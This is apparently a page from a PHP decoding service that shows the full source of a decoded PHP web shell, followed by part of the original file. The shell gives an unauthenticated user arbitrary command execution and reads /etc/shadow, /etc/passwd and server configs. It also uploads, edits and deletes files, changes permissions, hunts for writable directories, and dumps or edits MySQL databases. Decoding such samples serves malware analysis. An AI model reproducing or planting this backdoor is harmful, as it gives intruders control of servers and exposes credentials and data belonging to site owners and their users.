Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ## ## # ..

Decoded Output download

<?php 
 
                                       ##    ##  # 
                                         ##     #  #### 
                                           ## ##  ##  ## 
                                       ###  ###  ##    # 
                                     ### ##     ##     ## 
                                   ##    ###  ##       ## 
                                          #     #     ## 
                                        ###    #     ## 
                                      ### #   ##    ## 
                                      #   ##  ##   ## 
                                           #   ##### 
                                   #       ##   ### 
                                  ##     ###     # 
                                   ####### 
                                    ##### 
 
//error_reporting(0); 
@ini_restore("safe_mode");  
@ini_restore("open_basedir");  
if(get_magic_quotes_gpc()){ 
while(list($key,$val)=each($_POST)){ 
$_POST[$key]=stripslashes($val);}} 
set_magic_quotes_runtime(0); 
@set_time_limit(0); 
@ini_set('max_execution_time',0); 
@ini_set('output_buffering',0); 
$name='1';  
$pass='c8d3a760ebab631565f8509d84b3b3f1'; 
if(false){#esli nado pishem 'true' 
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){ 
header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized'); 
exit;}} 
header("Cache-Control: no-store, no-cache, must-revalidate"); 
header("Cache-Control: post-check=0, pre-check=0", false); 
header("Pragma: no-cache"); 
function font($color,$text,$size=4){return("<font color=$color size=$size >$text</font>");} 
function w($a){return str_repeat("&nbsp;",$a);} 
function b($b){return "<b>$b</b>";} 
function e($e){switch($e){ 
case 0:return('no such file'); 
case 1:return('no such dirictory'); 
case 2:return('permission denied'); 
case 3:return('is not dirictory'); 
case 4:return('is a dirictory'); 
}} 
function test_file($filename){ 
return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));} 
if(isset($_POST['downl']) && !empty($_POST['downf'])){ 
if(!preg_match('/^\//',$_POST['downf'])){ 
$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];} 
if(!test_file($_POST['downf'])){ 
if(!is_dir($_POST['downf'])){ 
$fd=fopen($_POST['downf'], "rb"); 
$nam=preg_replace('/.+\//','',$_POST['downf']); 
header("Content-Type: application/octet-stream; name=\"".$nam."\""); 
header("Content-Length: ".filesize($_POST['downf'])); 
header("Content-disposition: attachment; filename=\"".$nam."\""); 
while(!feof($fd)){ 
$buffer=fgets($fd,4096); 
echo $buffer; 
} 
fclose ($fd); 
exit; 
} 
else $error=font('red',e(4)); 
} 
else $error=test_file($_POST['downf']);} 
if(isset($_POST['sql']) && !isset($_POST['exitsql'])){ 
$text="<body bgcolor=#C2DDFF> 
<b>Mysql@server:user:pass:db</b> 
<form method='POST'> 
"; 
$a=array('server','user','password','db');$i=-1; 
while($i++<3){ 
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>
";} 
$text.="<input type='submit' name='sql' value='Connect'> 
<input type='submit' name='exitsql' value='Exit'>"; 
$text="
<body bgcolor=#C2DDFF> 
<b>Mysql@server:user:pass:db</b> 
<form method='POST'>
"; 
$a=array('srv','user','pass','db');$i=-1; 
while($i++<3){ 
$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>
";} 
$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>
"; 
if(isset($_POST['sql'])){ 
if(isset($_POST['user']))$user=$_POST['user']; 
if(isset($_POST['pass']))$password=$_POST['pass']; 
if(isset($_POST['srv'])){ 
$server=$_POST['srv']; 
$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");} 
else{die($text."</form>");} 
if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");} 
function write($data){ 
switch($_POST['save']){ 
case 0: 
global $dump; 
$dump.=$data; 
break; 
case 1: 
global $fp; 
switch($_POST['compr']){ 
case 0: 
fwrite($fp,$data); 
break; 
case 1: 
gzwrite($fp, $data); 
break; 
case 2: 
bzwrite($fp,$data); 
break;} 
break;}} 
function sqlh(){ 
global $dump,$server; 
write("#
#Server : ".getenv('SERVER_NAME')." 
#DB_Host : ".$server." 
#DB : ".$_POST['db']." 
#Table : ".$_POST['table_sel']."
#

");} 
function sql(){ 
global $dump,$connect; 
$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect)); 
write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;
".$row[1].";

");} 
function sql1(){ 
global $connect; 
$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect); 
function test($aaa){ 
$d=array(); 
while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);} 
return($d);} 
while ($line=mysql_fetch_assoc($result)) { 
((!isset($key))?($key=implode('`, `',array_keys($line))):null); 
$ddd=test(array_values($line)); 
$val=implode('\', \'',$ddd); 
write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');
");} 
mysql_free_result($result);} 
function head($tmpfname,$name){ 
header("Content-Type: application/octet-stream; name=\"$name\""); 
header("Content-Length: ".filesize($tmpfname).""); 
header("Content-disposition: attachment; filename=\"$name\""); 
$fd=fopen($tmpfname, "r"); 
while(!feof($fd)){ 
echo fgets($fd, 4096);} 
fclose($fd); 
unlink($tmpfname); 
exit;} 
if(isset($_POST['back']) && isset($_POST['table_sel'])){ 
$dump=''; 
if($_POST['save']==1){ 
$tmpfname=tempnam($_POST['save_p'], "FOO"); 
switch($_POST['compr']){ 
case 0: 
$fp=fopen($tmpfname,"w"); 
break; 
case 1: 
$fp=gzopen($tmpfname, "w9"); 
break; 
case 2: 
$fp=bzopen($tmpfname, "w"); 
break;}} 
switch($_POST['as']){ 
case 0: 
switch($_POST['as_sql']){ 
case 0: 
sqlh(); 
sql(); 
break; 
case 1: 
sqlh(); 
sql(); 
sql1(); 
break; 
case 2: 
sqlh(); 
sql1(); 
break;} 
if($_POST['save']==1){ 
switch($_POST['compr']){ 
case 0: 
$n='.txt'; 
fclose($fp); 
break; 
case 1: 
$n='.gz'; 
gzclose($fp); 
break; 
case 2: 
$n='.bz2'; 
bzclose($fp); 
break;} 
head($tmpfname,$_POST['table_sel'].$n);} 
break; 
case 1: 
$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);  
if(mysql_num_rows($res) > 0) { 
while($row = mysql_fetch_assoc($res)) {  
$values = array_values($row);  
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}  
$values = implode($_POST['cvs_term'], $values);  
write($values);}} 
break;}} 
echo "$text
<table height=200 width=100%><tr><td bgcolor=green width=10%>"; 
$db_list=mysql_list_dbs($connect); 
echo "<select name='db' multiple size=30>
"; 
while($row=mysql_fetch_object($db_list)){ 
$db1=$row->Database; 
echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>
";} 
echo "</select></td><td bgcolor=#CBC3B6>
"; 
if(!empty($_POST['db'])){ 
$tb_list=mysql_list_tables($_POST['db']); 
echo "<select name='table_sel' multiple size=30>"; 
for($i=0;$i<mysql_num_rows($tb_list);$i++){ 
$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i))); 
echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";} 
echo "</select></td><td width=100%> 
<table  width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>
"; 
if(isset($_POST['table_sel'])){ 
$c=array('Browse','SQL','Insert','Export');$i=-1; 
while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}} 
echo "&nbsp;&nbsp;<b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>
";} 
if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0; 
elseif(isset($_POST['push']))$_POST['go']=1; 
if(isset($_POST['back']))$_POST['go']=3; 
if(isset($_POST['brow']))$_POST['go']=0; 
if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4; 
if(isset($_POST['ed_save']))$_POST['go']=5; 
if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0; 
if(isset($_POST['go'])){switch($_POST['go']){ 
case 0: 
if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){ 
$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql']))); 
$result=mysql_query($_POST['querysql'],$connect);} 
else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort=''; 
if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20'; 
if(isset($_POST['br_st']) && isset($_POST['br_en'])){ 
$co=$_POST['br_en'].','.$_POST['br_st'];} 
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);} 
for($i=0;$i<mysql_num_fields($result);$i++){ 
if(ereg('primary_key',mysql_field_flags($result, $i))) 
$prim=mysql_field_name($result, $i);} 
$up_e=''; 
echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>
"; 
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>
"; 
if(!isset($lk)){ 
echo "<td><b>EDIT</b></td>"; 
foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>
");}} 
if(!isset($prim)){ 
while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";} 
$up_e=substr($up_e,0,-5);} 
else{while(list($key,$val)=each($line)){ 
if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}} 
$up_e=urlencode($up_e); 
echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>
"; 
$up_e=''; 
foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>
";} 
echo "</tr>
";} 
echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by 
<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'> 
Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b> 
<input type=submit name=editr value=Edit>"; 
mysql_free_result($result); 
break; 
case 1: 
echo "<input type=submit name=push value=Run><br> 
<textarea cols=70% rows=8 name='querysql'>
".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>
"; 
if(!empty($_POST['querysql'])){ 
$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>"); 
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";} 
break; 
case 2: 
echo "<div style='width:100%;height:550;overflow:auto;'><table>
"; 
$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect); 
for($i=0;$i<mysql_num_fields($fields);$i++){ 
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>
";} 
echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>"; 
break; 
case 3: 
if(!isset($_POST['back']))echo '<table height=250  align="center"><TR><TD> 
<table height=100%> 
<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr> 
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr> 
<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr> 
<tr><td height=100%></td></tr> 
</table></TD><td> 
<table width="140" height=100%> 
<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR> 
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR> 
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR> 
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR> 
<TR><TD bgcolor="#A8B8F1"  height="20"><b>CSV</b></TD></TR> 
<TR><TD bgcolor="#D0E0FF"  height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR> 
<tr><td height=100%></tb></tr> 
</table> 
</td><td> 
<table height=100%> 
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr> 
<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr> 
<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr> 
<tr><td height=100%></td></tr> 
</table></td><td> 
<table width="120" height=100%> 
<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR> 
<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'. 
((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':''). 
((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR> 
<tr><td height=100%></td></tr>':'').'</table></td></TR> 
<tr><td><input type=submit value=backup name=back></td></tr> 
</table>'; 
if(isset($_POST['back']) && isset($_POST['table_sel'])){ 
if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}} 
break; 
case 4: 
if(isset($_POST['edit'])){ 
$up_e=$_POST['edit']; 
echo "<input type=hidden name=edit value='$up_e'>"; 
$up_e=urldecode($_POST['edit']); 
echo "<div style='width:100%;height:550;overflow:auto;'><table>
";$fi=0; 
$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect); 
while($line=mysql_fetch_array($result,MYSQL_ASSOC)){ 
foreach($line as $key=>$col_value) { 
echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>
"; 
$fi++;}} 
echo "</table></div><input type=submit name=ed_save value=Save>";} 
break; 
case 5: 
$ted=''; 
$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :) 
while(list($key1,$val1)=each($_POST2)){ 
if(preg_match('/ed_key:(.+)/',$key1,$m)) 
{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}} 
$ted=substr($ted,0,-2); 
$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 "); 
echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>"; 
$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>"); 
echo "<div style='background-color:green;'>".mysql_info($connect)."</div>"; 
break;}} 
echo "</td></tr></table></td></tr></table><input type=hidden name=sql>
";} 
else echo $text; 
echo "</form></body>";exit;} 
echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>
"; 
if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>')); 
if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>')); 
if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>')); 
if(!empty($_POST['th']))@chdir($_POST['th']); 
echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE")); 
#UP 
if(isset($_POST['up']))@chdir('../'); 
#CD 
if(isset($_POST['c']) && $_POST['cd']!=''){ 
if(!test_file($_POST['cd'])){ 
if(is_dir($_POST['cd'])){ 
@chdir($_POST['cd']); 
} 
else $error=font('red',e(3)); 
} 
else $error=test_file($_POST['cd']);} 
echo w(3)."<input type=text size=60 value=".getcwd().">"; 
echo font('blue','USER : '.get_current_user()); 
if(file_exists("/")) 
echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ')); 
if(file_exists("C:/")) 
echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ')); 
if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE'); 
echo "<br>"; 
?> 
<hr> 
<form method=POST name=main> 
<input type="submit" value="^" name="up"> 
<input type=text name=cd> 
<input type=submit value=cd name=c> 
<input type=text name=open> 
<input type=submit value=open name=op> 
<input type=text name=new> 
<input type=submit name=cr value="new file"> 
<input type=text name=exec> 
<input type=submit name=exe value=exec> 
<input type=submit name=info value=phpinfo> 
<br> 
<?php 
$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf'); 
echo '<select name=passwd>'; 
foreach($ar_file as $ar_l){ 
if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>
";} 
echo '</select><input type=submit name=passw value="read file">'; 
?> 
<input type=submit name=menu value=upload> 
<input type=text name=downf> 
<input type=submit name=downl value=download> 
<input type=text name="test"> 
<input type=submit name=tes value="perms"> 
<input type="submit" name="sql" value="mysql"> 
<input type="submit" name="eval" value="eval"> 
<br> 
<input type=text name=strin> 
<input type=text name=remot> 
<input type=submit name=copy value=copy> 
<input type="text" name="renold" > 
<input type="text" name="rennew" > 
<input type="submit" name="rename" value="rename"> 
<input type=text name=rm > 
<input type=submit name=del value=del> 
<br> 
<input type=reset value=RESET> 
<input type="text" name="mkdir"> 
<input type="submit" name="mk" value="mkdir"> 
<input type="text" name="rmdir"> 
<input type="submit" name="rmd" value="rmdir"> 
<input type="text" name="ch_mod"> 
<?php 
for($bch=1;$bch<=3;$bch++){echo"<select name=ch_p$bch>
"; 
for($ach=7;$ach>=0;$ach--){echo"<OPTION value=$ach>$ach</OPTION>";} 
echo"</select>";} 
?> 
<input type="submit" name="ch_chmod" value="chmod"> 
<input type=submit name=find value='find writeable'> 
<br> 
<hr> 
<?php 
#FIND WRITEABLE############## 
if(isset($_POST['find'])){ 
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');} 
if(isset($_POST['fww']) && !empty($_POST['fpath'])){ 
echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>'); 
$arrfw=array($_POST['fpath']); 
$ife=0; 
while(++$ife<=count($arrfw)){ 
$pathfw=$arrfw[$ife-1]; 
if(is_readable($pathfw)){ 
if($hfw=opendir($pathfw)){ 
while(false!==($ffw=readdir($hfw))){ 
$ffw=$pathfw.$ffw; 
if(!preg_match('/\/\.+$/',$ffw)){ 
if(is_dir($ffw)){array_push($arrfw,$ffw.'/');} 
print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}} 
closedir($hfw);}}}} 
 
 
if(isset($_POST['eval'])){ 
echo "<textarea cols=70 rows=7 name='ev'></textarea>
"; 
 
 
 
 
 
echo ""; 
} 
############################################################################ 
#RENAME 
if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){ 
if(file_exists($_POST['renold'])){ 
@rename($_POST['renold'],$_POST['rennew']); 
} 
else $error=font('red',e(0)); 
} 
# 
 
#RMDIR 
if(isset($_POST['rmd']) && isset($_POST['rmdir'])){ 
if(file_exists($_POST['rmdir'])){ 
if(is_dir($_POST['rmdir'])){ 
if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet");  
else $error=font('red','dir not deleted'); 
} 
else $error=font('red',e(3)); 
} 
else $error=font('red',e(0)); 
} 
# 
#CHMOD 
if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){ 
if(file_exists($_POST['ch_mod'])){ 
@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));} 
else $error=font('red',e(0));} 
# 
#DELETE 
if(isset($_POST['del']) && $_POST['rm']!=''){ 
if(file_exists($_POST['rm'])){ 
if(!is_dir($_POST['rm'])){ 
@unlink($_POST['rm']); 
} 
else echo "<br>".font('red',e(4)."<br>"); 
} 
else echo "<br>".font('red',e(0)."<br>"); 
} 
# 
#EXEC 
if(!empty($_POST['exe'])){ 
if(@exec($_POST['exec'],$ar)){ 
echo "<textarea cols=70 rows=15>"; 
foreach($ar as $line){ 
echo $line."
"; 
} 
echo "</textarea>";}} 
# 
#OPEN FILE 
if(isset($_POST['op']) && $_POST['open']!=''){ 
if(!test_file($_POST['open'])){ 
if(!is_dir($_POST['open'])){ 
$fil=file($_POST['open']); 
echo "<textarea cols=100 rows=20 name=edit>"; 
foreach($fil as $vv){ 
echo htmlspecialchars($vv); 
} 
echo "</textarea><br>".font('green',"FILE : ".$_POST['open'],3); 
if(is_writable($_POST['open'])==1){ 
echo w(2).font('green','ACCESS GRANTED'); 
echo "<input type=submit name=save value=save><input type=hidden value=".$_POST['open']." name=sv>"; 
}} 
else $error=font('red',e(2)); 
} 
else $error=test_file($_POST['open']); 
} 
if(isset($_POST['save'])){ 
$fr=fopen($_POST['sv'],"w"); 
$out=$_POST['edit']; 
fputs($fr,$out); 
fclose($fr); 
} 
# 
#CREATE FILE 
if(isset($_POST['cr']) && $_POST['new']!=''){ 
if(is_writable(dirname($_POST['new']))){ 
echo font('green',"Create new file : ".$_POST['new'],3)."<br><textarea name=newf cols=100 rows=20></textarea> 
<input type=submit name=cre value=create> 
<input type=hidden value=".$_POST['new']."  name=nf>"; 
} 
else echo "<br>".font('red',e(2)."<br>"); 
} 
if(isset($_POST['cre'])){ 
$ee=fopen($_POST['nf'],'w+'); 
$out=$_POST['newf']; 
fputs($ee,$out); 
fclose($ee); 
} 
# 
#MKDIR 
if(isset($_POST['mk']) && $_POST['mkdir']!=''){ 
if(is_writeable('./')){ 
@mkdir($_POST['mkdir']); 
echo font('green',"dir ".b($_POST['mkdir'])." create");  
} 
else echo font('red',e(2)); 
} 
# 
echo "<input type=hidden name=th value=".getcwd()."></form>"; 
#UPLOAD FILE 
if(isset($_POST['menu']) || isset($_POST['qq'])){ 
echo " 
<form enctype=multipart/form-data  method=post> 
Save as :<input type=text name=name>File :<input name=userfile type=file> 
<input type=submit value=Send name=go_up> 
<input type=hidden name=qq> 
<input type=hidden name=th value=".getcwd()."></form>"; 
if(isset($_POST['go_up'])){ 
if(isset($_POST['name']) && $_POST['name']==''){ 
$_POST['name']=$_FILES['userfile']['name'];} 
if(!preg_match('/^\//',$_POST['name'])){ 
$_POST['name']=$_POST['th'].'/'.$_POST['name'];} 
if(is_uploaded_file($_FILES['userfile']['tmp_name'])){ 
@copy($_FILES['userfile']['tmp_name'],$_POST['name']);} 
else echo "<br>".font('red',"Permisions denied");}} 
# 
#TEST PERM 
if(isset($_POST['tes']) && $_POST['test']!=''){ 
$j=$_POST['test']; 
if(file_exists($j)){ 
$w=''; 
if(is_writeable($j)){ 
$w=w(1).'WRITE'.w(1); 
} 
if(is_readable($j)){ 
$w=$w.w(1).'READ'.w(1); 
} 
echo font('green',$w.sprintf("%o", (fileperms($_POST['test'])) & 0777)); 
} 
else echo font('red',$e(0)); 
} 
# 
#COPY 
if(isset($_POST['copy'])&& $_POST['strin']!='' && $_POST['remot']!=''){ 
if(file_exists(dirname($_POST['remot']))){ 
if(file_exists($_POST['strin'])){ 
if(is_writable(dirname($_POST['remot']))){ 
if(is_readable($_POST['strin'])){ 
@copy($_POST['strin'],$_POST['remot']); 
} 
else echo font('red',"no read string file"); 
} 
else echo font('red',"no write dest directory"); 
} 
else echo font('red',"no such file"); 
} 
else echo font('red',"no such dest dir"); 
} 
# 
#CHECK DISK 
if(isset($_POST['free']) && $_POST['dirfree']!=''){ 
if(file_exists($_POST['dirfree'])){ 
$fre=@disk_free_space($_POST['dirfree'])/1048576; 
echo font('green',"Free space in ".b($_POST['dirfree'])." : ".$fre." Mb"); 
$fre1=@disk_total_space($_POST['dirfree'])/1048576; 
echo "<br>".font('green',"Full size in ".b($_POST['dirfree'])." : ".$fre1." Mb"); 
} 
else echo font('red',"No such disk"); 
} 
# 
(isset($_POST['info']))?phpinfo():null; 
# 
#PASSWD 
if(!empty($_POST['passwd']) && isset($_POST['passw'])){ 
echo "<center>".font('blue',"file : ".$_POST['passwd'],6)."</center><br><textarea cols=100 rows=15>
"; 
foreach(@file($_POST['passwd']) as $fed)echo $fed; 
echo "</textarea><br>
";} 
# 
if(isset($error))echo $error;?> 
<hr><?php 
################################################################################## 
if(is_readable(getcwd())){ 
if($h=opendir(getcwd())){ 
$arr=array(); 
while(false!==($f=readdir($h))){array_push ($arr,$f);} 
closedir($h);}} 
else die("<center>".b(font('red','FUNCTION LIST PERMISSION DENIED',6))."</center>"); 
sort($arr); 
echo '<table width=800 bgcolor=#DFD6C8 cellspacing=0 cellpadding=0 border=1>'; 
foreach($arr as $f){ 
$l=@lstat($f); 
print((is_readable($f) && is_writeable($f))?"<tr><td>".w(1).b("R".w(1).font('red','RW',3)).w(1):(((is_readable($f))?"<tr><td>".w(1).b("R").w(4):"").((is_writable($f))?"<tr><td>".w(1).b(font('red','RW',3)):""))); 
$r=sprintf("%o",(@fileperms($f)) & 0777); 
$ow=posix_getpwuid($l[4]); 
$gr=posix_getgrgid($l[5]); 
$fow=($ow["name"]?$ow["name"]:fileowner($f))."/".($gr["name"]?$gr["name"]:filegroup($f)); 
if(!is_readable($f) && !is_writeable($f)) echo "<tr><td>".w(12); 
echo "</td><td>$r</td><td>$fow</td>"; 
if(!is_dir($f)){ 
if(!is_link($f)){ 
echo w(2)."<td><i>".$l[7]."</i></td>";} 
else echo "</td><td>link</td>";} 
else echo "</td><td>DIR</td>"; 
$fi=htmlspecialchars($f); 
echo "<td>".@strftime('%B %e %H:%M',@filemtime($f))."</td><td>".(is_dir($f)?font('blue',$fi,3):$fi)."</td>
";} 
?> 
</table></body></html> 
<?php exit; ?> 

Did this file decode correctly?

Original Code

<?php

                                       ##    ##  #
                                         ##     #  ####
                                           ## ##  ##  ##
                                       ###  ###  ##    #
                                     ### ##     ##     ##
                                   ##    ###  ##       ##
                                          #     #     ##
                                        ###    #     ##
                                      ### #   ##    ##
                                      #   ##  ##   ##
                                           #   #####
                                   #       ##   ###
                                  ##     ###     #
                                   #######
                                    #####

//error_reporting(0);
@ini_restore("safe_mode"); 
@ini_restore("open_basedir"); 
if(get_magic_quotes_gpc()){
while(list($key,$val)=each($_POST)){
$_POST[$key]=stripslashes($val);}}
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
$name='1'; 
$pass='c8d3a760ebab631565f8509d84b3b3f1';
if(false){#esli nado pishem 'true'
if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized');
exit;}}
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");
function font($color,$text,$size=4){return("<font color=$color size=$size >$text</font>");}
function w($a){return str_repeat("&nbsp;",$a);}
function b($b){return "<b>$b</b>";}
